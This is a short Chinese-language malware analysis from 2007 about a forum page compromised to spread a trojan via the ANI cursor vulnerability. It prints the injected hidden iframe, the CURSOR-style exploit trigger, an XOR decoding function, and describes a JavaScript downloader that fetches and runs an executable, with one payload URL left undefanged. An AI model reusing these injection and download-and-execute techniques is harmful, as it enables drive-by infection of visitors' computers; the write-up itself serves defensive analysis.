某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码

endurer 原创
2007-04-22 第1版

加入的代码为：
/---
＜iframe src='hxxp://s**72.91**152**0.net/site/g****g/1**.htm' height=0 width=50＞＜/iframe＞
---/

hxxp://s**72.91**152**0.net/site/g****g/1**.htm 包含为：
/---
＜DIV
style="CURSOR: url('love.jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞
＜iframe src=hxxp://s**72.91**152**0.net/site/g****g/1**4.htm  name="main1" height="0" width="100" ＞＜/iframe＞
---/
love.jpg（Kaspersky报为Exploit.Win32.IMG-ANI.k）下载 http://mail.8u8y.com/ad/pic/1.exe

文件说明符 : D:/test/1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-20 12:39:24
修改时间 : 2007-4-20 12:40:32
访问时间 : 2007-4-20 12:40:42
大小 : 21479 字节 20.999 KB
MD5 : 946bc00b1bcc782fade890c049e8e112

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bga ，瑞星报为 Trojan.Mnless.kip

hxxp://s**72.91**152**0.net/site/g****g/1**4.htm的内容为JavaScript脚本代码，功能为用自定义函数：

/---
var Z＝function（m）｛return String.fromCharCode（m^79）｝；
---/

解密代码并通过 eval() 来运行。

解密后的 内容仍为JavaScript脚本代码，功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://mail.8***u**8y.com/ad/pic***/temp.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number ＝ Math.random（）＊n;
return ＇～tmp＇＋Math.round（number）＋＇.exe＇；｝
---/

生成，即 ~tmp****.exe，其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。
temp.exe与前面的1.exe相同。